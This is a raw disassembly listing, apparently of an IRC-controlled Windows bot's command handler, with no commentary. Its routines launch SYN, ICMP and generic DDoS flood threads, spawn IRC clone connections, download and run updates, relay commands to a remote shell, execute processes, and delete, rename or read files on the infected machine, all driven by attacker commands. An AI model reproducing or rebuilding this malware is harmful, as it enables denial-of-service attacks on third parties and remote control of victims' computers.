mov dword_430554[ecx], eax
jz short loc_40C605
loc_40C5EF: ; CODE XREF: sub_409557+30AC�j
cmp [ebp+var_568], ebx
jnz loc_40BC76
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C5EF
; ---------------------------------------------------------------------------
loc_40C605: ; CODE XREF: sub_409557+3096�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
jmp loc_40C808
; ---------------------------------------------------------------------------
loc_40C616: ; CODE XREF: sub_409557+1ED1�j
; sub_409557+1EE8�j
push 7Fh
lea eax, [ebp+var_774]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_6F4]
push [ebp+Str1] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_674]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_5F4]
push [ebp+var_8C] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_8]
push [ebp+Src]
mov esi, [ebp+var_4]
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
push [ebp+Str1]
mov [ebp+var_778], eax
lea eax, [ebp+Dst]
push edi
push offset aSynFloodingSSF ; "[SYN]: Flooding: (%s:%s) for %s seconds"...
push eax ; Dest
mov [ebp+var_570], esi
call _sprintf
add esp, 44h
lea eax, [ebp+Dst]
push ebx ; int
push 0Bh ; int
push eax ; Source
call sub_411C3A
add esp, 0Ch
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_778]
push ebx
push eax
push offset sub_4109BE
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C6E9
loc_40C6D7: ; CODE XREF: sub_409557+3190�j
cmp [ebp+var_568], ebx
jnz short loc_40C704
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C6D7
; ---------------------------------------------------------------------------
loc_40C6E9: ; CODE XREF: sub_409557+317E�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset aSynFailedToSta ; "[SYN]: Failed to start flood thread, er"...
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C704: ; CODE XREF: sub_409557+3186�j
cmp [ebp+var_8], ebx
jnz loc_40B858
push ebx
push esi
jmp loc_40B840
; ---------------------------------------------------------------------------
loc_40C714: ; CODE XREF: sub_409557+1E8C�j
; sub_409557+1EA3�j ...
push 7Fh
lea eax, [ebp+var_7F0]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_770]
push [ebp+Str1] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_6F0]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_670]
push [ebp+var_8C] ; Source
push eax ; Dest
call _strncpy
push 20h ; Count
lea eax, [ebp+var_5F0]
push [ebp+Dest] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
push [ebp+Src]
mov esi, [ebp+arg_4]
mov [ebp+var_570], eax
mov eax, [ebp+var_8]
push [ebp+Str1]
mov [ebp+var_56C], eax
lea eax, [ebp+Dst]
push edi
push offset aDdosFloodingSS ; "[DDoS]: Flooding: (%s:%s) for %s second"...
push eax ; Dest
mov [ebp+var_7F8], esi
call _sprintf
add esp, 50h
lea eax, [ebp+Dst]
push ebx ; int
push 0Ah ; int
push eax ; Source
call sub_411C3A
add esp, 0Ch
mov [ebp+var_7F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F8]
push ebx
push eax
push offset sub_4030D9
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_7F4]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C7FC
loc_40C7E6: ; CODE XREF: sub_409557+32A3�j
cmp [ebp+var_568], ebx
jnz loc_40BC76
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C7E6
; ---------------------------------------------------------------------------
loc_40C7FC: ; CODE XREF: sub_409557+328D�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aDdosFailedToSt ; "[DDoS]: Failed to start flood thread, e"...
loc_40C808: ; CODE XREF: sub_409557+2701�j
; sub_409557+284C�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
jmp loc_40BC73
; ---------------------------------------------------------------------------
loc_40C819: ; CODE XREF: sub_409557+1E5E�j
; sub_409557+1E75�j
push 7Fh ; Count
lea eax, [ebp+var_444]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+Str1] ; Str
call _atoi
push 3Fh ; Count
mov [ebp+var_2F4], eax
push [ebp+Src] ; Source
lea eax, [ebp+var_3C4]
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+Str]
add esp, 1Ch
cmp esi, ebx
jz short loc_40C867
push 3Fh ; Count
lea eax, [ebp+var_384]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_40C867: ; CODE XREF: sub_409557+32FC�j
lea eax, [ebp+var_3C4]
mov [ebp+var_2F0], 1
push eax
lea eax, [ebp+var_444]
push [ebp+var_2F4]
push eax
lea eax, [ebp+Dst]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 17h ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov [ebp+var_2EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_448]
push ebx
push eax
push offset sub_409277
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_2EC]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C8F3
loc_40C8DD: ; CODE XREF: sub_409557+339A�j
cmp [ebp+var_2E8], ebx
jnz loc_40B799
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C8DD
; ---------------------------------------------------------------------------
loc_40C8F3: ; CODE XREF: sub_409557+3384�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40B78A
; ---------------------------------------------------------------------------
loc_40C904: ; CODE XREF: sub_409557+1E1E�j
; sub_409557+1E35�j
push [ebp+Str1] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_578], eax
jle loc_40C9F5
mov esi, 80h
push edi ; Format
lea eax, [ebp+var_700]
push esi ; Count
push eax ; Dest
call __snprintf
xor eax, eax
cmp [ebp+var_9A2], bl
push [ebp+var_8C] ; Format
setnz al
mov [ebp+var_574], eax
mov eax, [ebp+arg_4]
mov [ebp+var_704], eax
lea eax, [ebp+var_600]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
push [ebp+Str1]
mov [ebp+var_570], eax
mov eax, [ebp+var_8]
mov [ebp+var_56C], eax
push edi
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Dh ; int
push eax ; Source
call sub_411C3A
add esp, 38h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_704]
push ebx
push eax
push offset sub_40588C
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40C9E4
loc_40C9CE: ; CODE XREF: sub_409557+348B�j
cmp [ebp+var_568], ebx
jnz loc_40B837
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40C9CE
; ---------------------------------------------------------------------------
loc_40C9E4: ; CODE XREF: sub_409557+3475�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
jmp loc_40B828
; ---------------------------------------------------------------------------
loc_40C9F5: ; CODE XREF: sub_409557+33BE�j
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
jmp loc_40DFA0
; ---------------------------------------------------------------------------
loc_40C9FF: ; CODE XREF: sub_409557+1DF0�j
; sub_409557+1E07�j
push [ebp+Str1]
push edi
call ds:dword_41B128 ; MoveFileA
test eax, eax
jz short loc_40CA2C
push [ebp+Str1]
lea eax, [ebp+Dst]
push edi
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_40CA4B
; ---------------------------------------------------------------------------
loc_40CA2C: ; CODE XREF: sub_409557+34B4�j
push offset aFile ; "[FILE]:"
call sub_40703D
push eax ; Format
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_40CA4B: ; CODE XREF: sub_409557+1822�j
; sub_409557+1848�j ...
cmp [ebp+var_8], ebx
jnz short loc_40CA6C
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40CA6C: ; CODE XREF: sub_409557+1050�j
; sub_409557+34F7�j ...
push 1
pop esi
loc_40CA6F: ; CODE XREF: sub_409557+3772�j
; sub_409557+3ED6�j ...
lea eax, [ebp+Dst]
push eax
call sub_402D63
pop ecx
mov eax, esi
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_40CA83: ; CODE XREF: sub_409557+1DC2�j
; sub_409557+1DD9�j
push 44h
lea eax, [ebp+var_48C]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
push 1
mov [ebp+var_48C], esi
pop esi
mov word ptr [ebp+var_45C], bx
push edi ; Str
mov [ebp+var_460], esi
call _atoi
add esp, 10h
cmp eax, esi
jnz short loc_40CAC0
mov word ptr [ebp+var_45C], 5
loc_40CAC0: ; CODE XREF: sub_409557+355E�j
cmp [ebp+var_C], ebx
jz loc_40B799
push [ebp+Str1] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_40B799
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_48C]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_41B094 ; CreateProcessA
test eax, eax
jnz short loc_40CB0B
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
jmp loc_40D4DD
; ---------------------------------------------------------------------------
loc_40CB0B: ; CODE XREF: sub_409557+35A8�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40B78A
; ---------------------------------------------------------------------------
loc_40CB16: ; CODE XREF: sub_409557+1D94�j
; sub_409557+1DAB�j
push [ebp+Str1] ; Str2
push offset aFenr ; "FEnR"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CC92
lea eax, [ebp+FullPath]
push eax
push 104h
call ds:dword_41B0F4 ; GetTempPathA
push 0FFh ; Count
lea eax, [ebp+var_788]
push edi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_2E4]
push eax
call sub_40F72B
push eax
lea eax, [ebp+FullPath]
push eax
lea eax, [ebp+var_688]
push offset aSS_exe ; "%s%s.exe"
push eax ; Dest
call _sprintf
mov eax, [ebp+esi+var_88]
add esp, 20h
cmp eax, ebx
mov [ebp+var_584], 1
mov [ebp+var_580], ebx
jz short loc_40CBA8
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_578], eax
jmp short loc_40CBAE
; ---------------------------------------------------------------------------
loc_40CBA8: ; CODE XREF: sub_409557+363B�j
mov [ebp+var_578], ebx
loc_40CBAE: ; CODE XREF: sub_409557+364F�j
mov esi, [ebp+esi+Str]
cmp esi, ebx
jz short loc_40CBC8
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_57C], eax
jmp short loc_40CBCE
; ---------------------------------------------------------------------------
loc_40CBC8: ; CODE XREF: sub_409557+3660�j
mov [ebp+var_57C], ebx
loc_40CBCE: ; CODE XREF: sub_409557+366F�j
movzx eax, [ebp+var_9AF]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+var_8C] ; Source
mov [ebp+var_574], eax
lea eax, [ebp+var_808]
mov [ebp+var_80C], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
push edi
mov [ebp+var_56C], eax
mov eax, [ebp+var_8]
mov [ebp+var_570], eax
lea eax, [ebp+Dst]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 16h ; int
push eax ; Source
call sub_411C3A
add esp, 24h
mov [ebp+var_588], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_80C]
push ebx
push eax
push offset sub_403520
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_588]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40CC75
loc_40CC63: ; CODE XREF: sub_409557+371C�j
cmp [ebp+var_568], ebx
jnz short loc_40CCA5
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40CC63
; ---------------------------------------------------------------------------
loc_40CC75: ; CODE XREF: sub_409557+370A�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
loc_40CC81: ; CODE XREF: sub_409557+3DC5�j
; sub_409557+3F1A�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
loc_40CC8D: ; CODE XREF: sub_409557+49C8�j
add esp, 0Ch
jmp short loc_40CCA5
; ---------------------------------------------------------------------------
loc_40CC92: ; CODE XREF: sub_409557+35D0�j
push offset aUpdateBotIdMus ; "[UPDATE]: Bot ID must be different than"...
loc_40CC97: ; CODE XREF: sub_409557+18AB�j
; sub_409557+192F�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40CCA5: ; CODE XREF: sub_409557+18B3�j
; sub_409557+190D�j ...
cmp [ebp+var_8], ebx
jnz short loc_40CCC6
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40CCC6: ; CODE XREF: sub_409557+3751�j
; sub_409557+3DBA�j ...
mov esi, [ebp+File]
jmp loc_40CA6F
; ---------------------------------------------------------------------------
loc_40CCCE: ; CODE XREF: sub_409557+1D66�j
; sub_409557+1D7D�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099D2
cmp [ebp+var_C], ebx
jz loc_4099D2
push [ebp+Str1] ; SubStr
push [ebp+var_C] ; Str
call _strstr
push eax
lea eax, [ebp+Dst]
push [ebp+var_8C]
push dword ptr [ebp+Args]
push [ebp+Str2]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
push edi ; Str
call _atoi
add esp, 30h
test eax, eax
jle short loc_40CD55
push edi ; Str
call _atoi
imul eax, 3E8h
pop ecx
push eax
call ds:dword_41B048 ; Sleep
loc_40CD55: ; CODE XREF: sub_409557+37E8�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_402D63
mov eax, [ebp+File]
pop ecx
inc eax
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_40CD69: ; CODE XREF: sub_409557+1D38�j
; sub_409557+1D4F�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099D2
cmp [ebp+var_C], ebx
jz loc_40E7D9
push [ebp+Str1] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
mov eax, [ebp+Str1]
inc eax
push offset aRepeat ; "repeat"
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
push esi
jz short loc_40CE25
push [ebp+var_8C]
lea eax, [ebp+Dst]
push dword ptr [ebp+Args]
push [ebp+Str2]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
push esi
lea eax, [ebp+Dst]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_402D63
push edi ; Str
call _atoi
add esp, 38h
test eax, eax
jle loc_40E7D9
push edi ; Str
call _atoi
add eax, [ebp+File]
pop ecx
jmp loc_4099D5
; ---------------------------------------------------------------------------
loc_40CE25: ; CODE XREF: sub_409557+3857�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40B78A
; ---------------------------------------------------------------------------
loc_40CE2F: ; CODE XREF: sub_409557+1D0A�j
; sub_409557+1D21�j
push [ebp+Str1]
lea eax, [ebp+Dst]
push offset aPartS ; "PART %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 10h
loc_40CE4C: ; CODE XREF: sub_409557+395F�j
test eax, eax
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
loc_40CE66: ; CODE XREF: sub_409557+4043�j
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_0 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E1E
loc_40CE8A: ; CODE XREF: sub_409557+5003�j
add esp, 0Ch
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40CE92: ; CODE XREF: sub_409557+1CDC�j
; sub_409557+1CF3�j
push [ebp+esi+var_88]
lea eax, [ebp+Dst]
push [ebp+Str1]
push offset aJoinSS_0 ; "JOIN %s %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 14h
jmp short loc_40CE4C
; ---------------------------------------------------------------------------
loc_40CEB8: ; CODE XREF: sub_409557+1CAE�j
; sub_409557+1CC5�j
push [ebp+Str1]
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 10h
test eax, eax
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_0 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E1E
push [ebp+Str1]
push edi ; Args
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40CF1C: ; CODE XREF: sub_409557+3A4F�j
; sub_409557+3ABA�j ...
call sub_402DD7
loc_40CF21: ; CODE XREF: sub_409557+4CD0�j
add esp, 18h
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40CF29: ; CODE XREF: sub_409557+1C80�j
; sub_409557+1C97�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push [ebp+Str1] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40CF5A
push esi
lea eax, [ebp+Dst]
push offset aModeS ; "MODE %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40CF5A: ; CODE XREF: sub_409557+39EC�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_0 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E1E
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40CF1C
; ---------------------------------------------------------------------------
loc_40CFAB: ; CODE XREF: sub_409557+1C52�j
; sub_409557+1C69�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push [ebp+Str1] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E7D9
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
push esi ; Args
push offset aS_0 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E1E
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40CF1C
; ---------------------------------------------------------------------------
loc_40D016: ; CODE XREF: sub_409557+1C24�j
; sub_409557+1C3B�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E7D9
push esi ; Args
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push esi ; Args
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
loc_40D048: ; CODE XREF: sub_409557+41E6�j
; sub_409557+41FF�j ...
call sub_402DD7
loc_40D04D: ; CODE XREF: sub_409557+3B5F�j
add esp, 14h
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40D055: ; CODE XREF: sub_409557+1BF6�j
; sub_409557+1C0D�j
push dword ptr [ebp+Args] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4099D2
push [ebp+Str1] ; Args
push offset aPartS_0 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push edi ; Str
call _atoi
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_41B048 ; Sleep
push [ebp+esi+var_88]
push [ebp+Str1] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_402D63
jmp short loc_40D04D
; ---------------------------------------------------------------------------
loc_40D0B8: ; CODE XREF: sub_409557+1BC8�j
; sub_409557+1BDF�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; Str
call _strlen
push [ebp+Dest] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Str1] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_40E7D9
push esi
lea eax, [ebp+Dst]
push offset dword_42653C ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push edi ; Str
push [ebp+arg_4] ; int
call sub_405E64
push esi
push edi ; Args
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_402DD7
add esp, 2Ch
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40D126: ; CODE XREF: sub_409557+1B9A�j
; sub_409557+1BB1�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; Str
call _strlen
push [ebp+Dest] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Str1] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_40E7D9
push ebx ; int
push ebx ; int
push esi ; int
push edi ; Str
push [ebp+arg_4] ; int
call sub_405E64
push esi
push edi ; Args
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_402DD7
jmp loc_40BDF3
; ---------------------------------------------------------------------------
loc_40D179: ; CODE XREF: sub_409557+1B6C�j
; sub_409557+1B83�j
cmp [ebp+var_C], ebx
jz loc_4099D2
push [ebp+Str1] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_4099D2
push eax ; int
push edi ; Str2
call sub_402C6B
push edi
lea eax, [ebp+Dst]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax ; Dest
call _sprintf
add esp, 14h
jmp loc_40B837
; ---------------------------------------------------------------------------
loc_40D1B8: ; CODE XREF: sub_409557+1B2C�j
; sub_409557+1B43�j
push edi ; SubStr
push [ebp+arg_1C] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_40E7D9
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_40D255
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40D23D
push esi
lea eax, [ebp+Dst]
push [ebp+var_8C]
push dword ptr [ebp+Args]
push [ebp+Str2]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
push esi
push edi
lea eax, [ebp+Dst]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax ; Dest
call _sprintf
add esp, 34h
inc [ebp+File]
jmp loc_40E43D
; ---------------------------------------------------------------------------
loc_40D23D: ; CODE XREF: sub_409557+3C8E�j
lea eax, [ebp+Dst]
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_40E43D
; ---------------------------------------------------------------------------
loc_40D255: ; CODE XREF: sub_409557+3C7D�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_411139
add esp, 0Ch
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
push edi
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 24h
jmp loc_40E43D
; ---------------------------------------------------------------------------
loc_40D29C: ; CODE XREF: sub_409557+1781�j
; sub_409557+1798�j
push offset aR ; "r"
push edi ; Filename
call _fopen
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_40D316
mov ebx, 200h
push esi ; File
lea eax, [ebp+Dst]
push ebx ; MaxCount
push eax ; Buf
call _fgets
add esp, 0Ch
loc_40D2C5: ; CODE XREF: sub_409557+3D9D�j
test eax, eax
jz short loc_40D2F6
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
push esi ; File
lea eax, [ebp+Dst]
push ebx ; MaxCount
push eax ; Buf
call _fgets
add esp, 20h
jmp short loc_40D2C5
; ---------------------------------------------------------------------------
loc_40D2F6: ; CODE XREF: sub_409557+3D70�j
push esi ; File
call _fclose
push edi
lea eax, [ebp+Dst]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_40CCC6
; ---------------------------------------------------------------------------
loc_40D316: ; CODE XREF: sub_409557+3D56�j
push edi
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
jmp loc_40CC81
; ---------------------------------------------------------------------------
loc_40D321: ; CODE XREF: sub_409557+1753�j
; sub_409557+176A�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E7D9
push offset asc_42002C ; "\n"
push esi ; Dest
call _strcat
push esi ; Str
call sub_40EDEE
add esp, 0Ch
test eax, eax
jnz short loc_40D361
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D361: ; CODE XREF: sub_409557+3DFE�j
push esi
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
jmp loc_40E42E
; ---------------------------------------------------------------------------
loc_40D36C: ; CODE XREF: sub_409557+1725�j
; sub_409557+173C�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_40E7D9
push eax ; Format
call sub_407102
test eax, eax
pop ecx
jnz short loc_40D39D
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D39D: ; CODE XREF: sub_409557+3E3A�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
jmp loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D3A7: ; CODE XREF: sub_409557+16F7�j
; sub_409557+170E�j
push ebx ; Source
push [ebp+var_8C] ; int
push [ebp+arg_4] ; int
push edi ; Str
call sub_404FFE
push edi
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40CF1C
; ---------------------------------------------------------------------------
loc_40D3C2: ; CODE XREF: sub_409557+16C9�j
; sub_409557+16E0�j
push edi
call ds:dword_41B110 ; DeleteFileA
test eax, eax
jz short loc_40D3D5
push edi
push offset aFileDeletedS_ ; "[FILE]: Deleted '%s'."
jmp short loc_40D3E0
; ---------------------------------------------------------------------------
loc_40D3D5: ; CODE XREF: sub_409557+3E74�j
push offset aFile ; "[FILE]:"
call sub_40703D
push eax ; Format
loc_40D3E0: ; CODE XREF: sub_409557+3E7C�j
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp loc_40CCA5
